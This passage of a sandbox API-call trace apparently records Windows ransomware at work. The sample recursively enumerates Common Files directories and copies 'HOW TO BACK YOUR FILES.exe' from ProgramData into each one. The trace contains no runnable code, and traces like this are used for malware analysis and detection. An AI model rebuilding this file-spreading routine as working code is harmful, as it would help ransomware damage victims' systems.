ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.689] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.689] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.690] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US" [0056.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.690] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US") returned 52 [0056.690] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US" [0056.690] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.690] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.694] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.694] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534bf800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.695] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.695] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines" [0056.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.695] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines") returned 49 [0056.695] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines" [0056.695] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.700] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.700] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534bf800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.701] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.701] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.701] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft" [0056.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0056.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.701] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft") returned 59 [0056.701] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft" [0056.701] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.701] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.706] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.706] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534e5960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534e5960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.706] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.706] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.706] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0056.706] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0056.706] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.706] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 65 [0056.706] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0056.706] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.706] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.707] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0056.707] GetLastError () returned 0x0 [0056.707] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0056.707] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0056.707] CloseHandle (hObject=0x118) returned 1 [0056.707] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0056.707] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.707] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.707] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.707] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.708] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0056.708] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.708] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.708] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 71 [0056.708] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0056.708] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.708] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.708] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0056.709] GetLastError () returned 0x0 [0056.709] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0056.709] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0056.709] CloseHandle (hObject=0x118) returned 1 [0056.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0056.709] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.709] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.709] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.709] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.709] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0056.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.709] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.709] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 79 [0056.709] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0056.709] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.709] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.719] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0056.719] GetLastError () returned 0x0 [0056.719] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0056.719] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0056.719] CloseHandle (hObject=0x118) returned 1 [0056.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0056.719] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.719] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.720] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.720] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.721] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Services") returned="C:\\Program Files (x86)\\Common Files\\Services" [0056.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0056.721] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0056.721] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Services") returned 44 [0056.721] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Services" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Services") returned="C:\\Program Files (x86)\\Common Files\\Services" [0056.721] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.721] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.726] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.726] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5350bac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5350bac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.726] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.726] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.726] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared" [0056.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0056.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0056.726] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared") returned 52 [0056.726] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared" [0056.726] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.726] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.731] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.731] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5350bac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5350bac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.731] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.731] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.731] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions" [0056.731] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0056.731] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0056.731] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions") returned 74 [0056.731] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions" [0056.731] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.732] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.736] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.736] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.737] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14" [0056.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.737] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0056.737] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14") returned 77 [0056.737] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14" [0056.737] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.737] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.741] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.741] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.742] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.742] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.742] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN" [0056.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0056.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0056.742] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft 